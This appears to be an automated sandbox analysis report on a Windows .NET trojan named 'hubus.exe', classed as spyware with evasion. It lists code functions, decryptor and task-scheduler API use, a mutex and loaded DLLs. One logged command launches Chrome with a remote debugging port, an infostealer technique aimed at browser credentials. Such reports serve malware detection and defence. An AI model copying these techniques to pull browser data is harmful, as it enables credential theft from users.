                          Source: C:\Users\user\Desktop\hubus.exeCode function: 0_2_02E5A5310_2_02E5A531
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 0_2_02E50B070_2_02E50B07
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 0_2_02E50B180_2_02E50B18
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 0_2_02E59FA80_2_02E59FA8
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 0_2_02E59FB80_2_02E59FB8
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 0_2_02E50D910_2_02E50D91
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 0_2_05A819A30_2_05A819A3
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 0_2_05A8E1D00_2_05A8E1D0
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 0_2_05A800400_2_05A80040
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 0_2_05A85CA80_2_05A85CA8
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 0_2_05A85C980_2_05A85C98
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 0_2_05A8CF080_2_05A8CF08
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 0_2_05A86F010_2_05A86F01
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 0_2_05A86F100_2_05A86F10
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 0_2_05A8CEF90_2_05A8CEF9
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 0_2_05A8E1C10_2_05A8E1C1
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 0_2_05A800060_2_05A80006
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 0_2_05AA87700_2_05AA8770
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 0_2_05AAD8100_2_05AAD810
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 0_2_05AAF0E40_2_05AAF0E4
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 0_2_05AAD8000_2_05AAD800
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 0_2_05AAE20A0_2_05AAE20A
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 0_2_05AAE2180_2_05AAE218
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 0_2_05AC9D000_2_05AC9D00
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 0_2_05AE24700_2_05AE2470
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 0_2_05AE1F200_2_05AE1F20
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 0_2_05AEC9680_2_05AEC968
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 0_2_05AE245F0_2_05AE245F
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 0_2_05AE1F110_2_05AE1F11
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 0_2_05AEC9580_2_05AEC958
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 0_2_05AE00060_2_05AE0006
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 0_2_05AE00400_2_05AE0040
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_0041E8001_2_0041E800
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_004240101_2_00424010
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_0040D0C61_2_0040D0C6
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_004170B81_2_004170B8
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_004279501_2_00427950
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_00414A001_2_00414A00
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_0043FAD01_2_0043FAD0
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_0041EB401_2_0041EB40
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_0041635B1_2_0041635B
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_00437B101_2_00437B10
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_004223A01_2_004223A0
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_0040AC101_2_0040AC10
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_0042D4CF1_2_0042D4CF
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_0043E4E01_2_0043E4E0
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_0041F4B01_2_0041F4B0
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_004125401_2_00412540
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_00410D641_2_00410D64
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_004385A01_2_004385A0
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_0040E5AD1_2_0040E5AD
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_004377401_2_00437740
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_004087101_2_00408710
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_00419F2F1_2_00419F2F
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_0043EFF01_2_0043EFF0
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_0041A0431_2_0041A043
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_004310601_2_00431060
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_0043E8701_2_0043E870
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_0043608A1_2_0043608A
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_004090B01_2_004090B0
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_0040E1521_2_0040E152
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_0041990E1_2_0041990E
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_004059201_2_00405920
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_004039301_2_00403930
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_004371301_2_00437130
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_004119341_2_00411934
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_004121381_2_00412138
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_004299C01_2_004299C0
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_004061801_2_00406180
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_004329801_2_00432980
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_0043DA401_2_0043DA40
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_00424A001_2_00424A00
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_004042E01_2_004042E0
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_0041F2A01_2_0041F2A0
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_00424B501_2_00424B50
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_0043DB501_2_0043DB50
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_0042EB161_2_0042EB16
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_004273201_2_00427320
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_0043832B1_2_0043832B
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_004263391_2_00426339
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_004073F01_2_004073F0
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_0041DB891_2_0041DB89
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_00428C651_2_00428C65
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_00422C001_2_00422C00
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_00404C101_2_00404C10
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_0043EC201_2_0043EC20
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_00427CD01_2_00427CD0
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_0043FCD01_2_0043FCD0
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_0041D4E01_2_0041D4E0
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_00416CE01_2_00416CE0
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_00427CF01_2_00427CF0
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_004094B01_2_004094B0
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_0040DD611_2_0040DD61
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_0042AD701_2_0042AD70
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_0042E5011_2_0042E501
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_0043DD201_2_0043DD20
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_004205D01_2_004205D0
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_004365D61_2_004365D6
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_0042E5D81_2_0042E5D8
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_00405DE01_2_00405DE0
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_0042D4CA1_2_0042D4CA
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_0041A5901_2_0041A590
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_0043DDB01_2_0043DDB0
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_0041BE501_2_0041BE50
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_0041CE7A1_2_0041CE7A
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_004066101_2_00406610
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_00438E171_2_00438E17
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_0042E6211_2_0042E621
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_0042362E1_2_0042362E
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_004156301_2_00415630
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_0042E6341_2_0042E634
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_00436ED01_2_00436ED0
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_0042C6F01_2_0042C6F0
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_004176FE1_2_004176FE
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_0041EF501_2_0041EF50
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_004247501_2_00424750
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_0040A7701_2_0040A770
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_0041DF701_2_0041DF70
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_004176FE1_2_004176FE
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_00416F051_2_00416F05
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_00445F081_2_00445F08
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_00402F201_2_00402F20
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_0043AF801_2_0043AF80
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_00429F981_2_00429F98
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_00422FB01_2_00422FB0
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_004297B81_2_004297B8
                          Source: C:\Users\user\Desktop\hubus.exeCode function: String function: 004149F0 appears 57 times
                          Source: C:\Users\user\Desktop\hubus.exeCode function: String function: 00407F80 appears 47 times
                          Source: hubus.exe, 00000000.00000002.12072878868.000000000103E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs hubus.exe
                          Source: hubus.exe, 00000000.00000002.12088018857.0000000005A30000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs hubus.exe
                          Source: hubus.exe, 00000000.00000002.12084979136.0000000004235000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs hubus.exe
                          Source: hubus.exe, 00000000.00000000.11852643145.0000000000A72000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesh.exe& vs hubus.exe
                          Source: hubus.exe, 00000000.00000002.12084979136.000000000412B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRvcuxtyhkb.dll" vs hubus.exe
                          Source: hubus.exe, 00000000.00000002.12087038268.00000000057C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRvcuxtyhkb.dll" vs hubus.exe
                          Source: hubus.exe, 00000000.00000002.12084979136.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs hubus.exe
                          Source: hubus.exe, 00000000.00000002.12084979136.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs hubus.exe
                          Source: hubus.exe, 00000000.00000002.12088688040.0000000005C00000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs hubus.exe
                          Source: hubus.exe, 00000000.00000002.12074166269.0000000003021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs hubus.exe
                          Source: hubus.exeBinary or memory string: OriginalFilenamesh.exe& vs hubus.exe
                          Source: hubus.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                          Source: hubus.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: hubus.exe, x7M8VDknD2gjeiKYIQ.csCryptographic APIs: 'CreateDecryptor'
                          Source: hubus.exe, x7M8VDknD2gjeiKYIQ.csCryptographic APIs: 'CreateDecryptor'
                          Source: 0.2.hubus.exe.412bf98.0.raw.unpack, jHbxqbxSp2bmg9amyFB.csCryptographic APIs: 'CreateDecryptor'
                          Source: 0.2.hubus.exe.412bf98.0.raw.unpack, jHbxqbxSp2bmg9amyFB.csCryptographic APIs: 'CreateDecryptor'
                          Source: 0.2.hubus.exe.412bf98.0.raw.unpack, jHbxqbxSp2bmg9amyFB.csCryptographic APIs: 'CreateDecryptor'
                          Source: 0.2.hubus.exe.412bf98.0.raw.unpack, jHbxqbxSp2bmg9amyFB.csCryptographic APIs: 'CreateDecryptor'
                          Source: 0.2.hubus.exe.425e9b8.2.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                          Source: 0.2.hubus.exe.425e9b8.2.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                          Source: 0.2.hubus.exe.425e9b8.2.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                          Source: 0.2.hubus.exe.425e9b8.2.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                          Source: 0.2.hubus.exe.4025570.3.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                          Source: 0.2.hubus.exe.4025570.3.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                          Source: 0.2.hubus.exe.5c00000.6.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                          Source: 0.2.hubus.exe.5c00000.6.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                          Source: 0.2.hubus.exe.5c00000.6.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                          Source: 0.2.hubus.exe.4025570.3.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                          Source: 0.2.hubus.exe.4025570.3.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                          Source: 0.2.hubus.exe.425e9b8.2.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                          Source: 0.2.hubus.exe.4025570.3.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: 0.2.hubus.exe.5c00000.6.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                          Source: 0.2.hubus.exe.4025570.3.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                          Source: 0.2.hubus.exe.4025570.3.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                          Source: 0.2.hubus.exe.5c00000.6.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                          Source: 0.2.hubus.exe.5c00000.6.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: 0.2.hubus.exe.425e9b8.2.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: 0.2.hubus.exe.425e9b8.2.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                          Source: 0.2.hubus.exe.425e9b8.2.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                          Source: 0.2.hubus.exe.425e9b8.2.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                          Source: 0.2.hubus.exe.4025570.3.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                          Source: 0.2.hubus.exe.425e9b8.2.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@17/0@4/5
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_00437B10 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,1_2_00437B10
                          Source: C:\Users\user\Desktop\hubus.exeMutant created: NULL
                          Source: C:\Users\user\Desktop\hubus.exeMutant created: \Sessions\1\BaseNamedObjects\Eptsphctnf
                          Source: hubus.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: hubus.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                          Source: C:\Users\user\Desktop\hubus.exeSystem information queried: HandleInformationJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: chrome.exe, 00000002.00000002.12196424496.00002D24032B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT COUNT(metric_value) FROM metrics WHERE metrics.metric_hash = 'CE71BF280B4EB4B5' AND metrics.metric_value > 45;
                          Source: chrome.exe, 00000002.00000002.12196424496.00002D24032B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '756F6A466879157E';
                          Source: chrome.exe, 00000002.00000002.12196657476.00002D2403308000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12195116163.00002D2403038000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196768862.00002D2403328000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT COUNT(DISTINCT CAST((event_timestamp / 1000000 / 60 / 10) AS int)) FROM metrics WHERE metrics.metric_hash = 'AD411B741D0DA012' AND metrics.metric_value > 0;
                          Source: chrome.exe, 00000002.00000002.12191913903.00002D2402AE4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
                          Source: chrome.exe, 00000002.00000002.12196424496.00002D24032B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT COUNT(metric_value) FROM metrics WHERE metrics.metric_hash = 'CE71BF280B4EB4B5' AND metrics.metric_value > 120;
                          Source: chrome.exe, 00000002.00000002.12196657476.00002D2403308000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12195116163.00002D2403038000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196768862.00002D2403328000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT COUNT(DISTINCT CAST((event_timestamp / 1000000 / 60 / 10) AS int)) FROM metrics WHERE metrics.metric_hash = 'B4CFE8741404B691' AND metrics.metric_value > 0;
                          Source: chrome.exe, 00000002.00000002.12196424496.00002D24032B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '19E16122849E343B';
                          Source: chrome.exe, 00000002.00000002.12197788182.00002D24034E4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT COUNT(id) FROM metrics WHERE metrics.metric_hash = '64BD7CCE5A95BF00';
                          Source: chrome.exe, 00000002.00000002.12191479618.00002D2402A5C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: chrome.exe, 00000002.00000002.12196424496.00002D24032B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '79964621D357AB88';
                          Source: chrome.exe, 00000002.00000002.12196842993.00002D2403330000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '534661B278B11BD';
                          Source: hubus.exeReversingLabs: Detection: 36%
                          Source: C:\Users\user\Desktop\hubus.exeFile read: C:\Users\user\Desktop\hubus.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\hubus.exe "C:\Users\user\Desktop\hubus.exe"
                          Source: C:\Users\user\Desktop\hubus.exeProcess created: C:\Users\user\Desktop\hubus.exe "C:\Users\user\Desktop\hubus.exe"
                          Source: C:\Users\user\Desktop\hubus.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2720,i,2268975299143198714,4336465224231573627,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2744 /prefetch:3
                          Source: C:\Users\user\Desktop\hubus.exeProcess created: C:\Users\user\Desktop\hubus.exe "C:\Users\user\Desktop\hubus.exe"Jump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"Jump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2720,i,2268975299143198714,4336465224231573627,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2744 /prefetch:3Jump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: edgegdi.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: edgegdi.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: webio.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
